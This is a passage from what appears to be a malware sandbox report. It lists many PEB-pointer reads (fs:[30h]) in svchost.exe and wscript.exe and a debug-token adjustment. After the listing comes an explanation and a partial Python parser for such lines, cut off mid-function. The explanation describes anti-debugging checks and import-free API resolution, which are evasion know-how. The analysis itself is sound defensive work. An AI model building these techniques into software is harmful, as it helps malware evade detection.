          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03924F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03924F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039BFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03968EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039536CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039DFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039376E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039516E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03958E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039DFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03937E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03937E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03937E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03937E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03937E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03937E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039EAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039EAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03952581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03952581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03952581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03952581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03922D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03922D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03922D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03922D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03922D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03951DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03951DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03951DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039535A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039D8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03954D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03954D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03954D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03947D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03963D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04869080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048E3884 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0487849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048920A0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0489F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0489F0BF mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04938CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048FB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048FB8D0 mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_049214FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048658EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048E6CF0 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048E6C0A mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04934015 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h] (14 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048E7016 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0493740D mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0489002D mov eax, dword ptr fs:[00000030h] (5 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0489BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0487B02A mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0489A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04880050 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048FC450 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04922073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0488746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04931074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04892581 mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0488C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0489A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04862D8A mov eax, dword ptr fs:[00000030h] (5 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0489FD9B mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04892990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048935A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048E69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048961A0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048E51BE mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04891DB5 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_049305AC mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048E6DC9 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048E6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048E6DC9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04918DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0486B1E1 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048F41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0487D5E0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04869100 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04938D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04884120 mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04884120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04894D3B mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0489513A mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h] (13 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0486AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048EA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0488B944 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048E3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04887D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0486C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0486B171 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0488C577 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048FFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0489D294 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048652A5 mov eax, dword ptr fs:[00000030h] (5 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048E46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04930EA5 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0487AAB0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0489FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04892ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04938ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048936CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0491FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048776E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048916E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04892AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0486C600 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04898E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04878A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0486AA16 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04883A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0489A61C mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04865210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04865210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04865210 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04921608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0486E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A4A2C mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0491FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04869240 mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04877E41 mov eax, dword ptr fs:[00000030h] (6 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048F4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0487766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0491B260 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04938A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0488AE73 mov eax, dword ptr fs:[00000030h] (5 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04871B8F mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\svchost.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\wscript.exe | Process token adjusted: Debug
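          Every hit above is a read of fs:[30h]. In a 32-bit (here WOW64) process the fs segment addresses the current thread's TEB, and offset 0x30 of the TEB is the pointer to the PEB. That pointer is the starting point both for anti-analysis checks (PEB.BeingDebugged at +0x02, PEB.NtGlobalFlag at +0x68) and for position-independent code that walks PEB.Ldr (+0x0C) to resolve APIs without an import table, which is why the sandbox flags it. The lines record only the fs read, not what is done with the pointer afterwards, so on their own they corroborate rather than prove either use. The Python below is an added example, not part of the Joe Sandbox report, that parses lines of this shape into a per-process summary; the sample input is a constructed subset of the lines above (one line deliberately not a code-function hit), and the only assumption about the "N_M_ADDRESS" function id is that its last field is the function's virtual address.

```python
"""Summarise sandbox 'Code function' hits of the form
   Source: <process> | Code function: <id> mov <reg>, dword ptr fs:[<offset>h]
(the '|' separator is optional, so lines with the path fused to 'Code function' parse too)."""
import re
from collections import Counter, defaultdict

LINE_RE = re.compile(
    r"Source:\s*(?P<proc>.+?\.exe)\s*\|?\s*Code function:\s*"
    r"(?P<fid>\d+_\d+_[0-9A-Fa-f]{8})\s+mov\s+(?P<reg>e[a-d]x|e[sd]i|e[bs]p),\s*"
    r"dword ptr fs:\[(?P<off>[0-9A-Fa-f]+)h\]"
)

# Fixed 32-bit TEB layout reachable through fs; 0x30 is the PEB pointer that
# BeingDebugged / NtGlobalFlag checks and PEB->Ldr API resolution start from.
TEB_FIELDS = {
    0x00: "NtTib.ExceptionList",
    0x18: "NtTib.Self",
    0x20: "ClientId.UniqueProcess",
    0x24: "ClientId.UniqueThread",
    0x2C: "ThreadLocalStoragePointer",
    0x30: "ProcessEnvironmentBlock",
    0x34: "LastErrorValue",
}


def parse_peb_reads(report_text):
    """One record per matching line; non-matching lines (headings, token
    adjustments) are skipped rather than guessed at."""
    records = []
    for line in report_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        off = int(m.group("off"), 16)
        fid = m.group("fid")
        records.append({
            "process": m.group("proc").rsplit("\\", 1)[-1].lower(),
            "function": fid,
            # Assumption: the last '_' field of the id is the function's VA.
            "address": int(fid.rsplit("_", 1)[-1], 16),
            "register": m.group("reg"),
            "offset": off,
            "field": TEB_FIELDS.get(off, "unknown"),
        })
    return records


def summarize(records):
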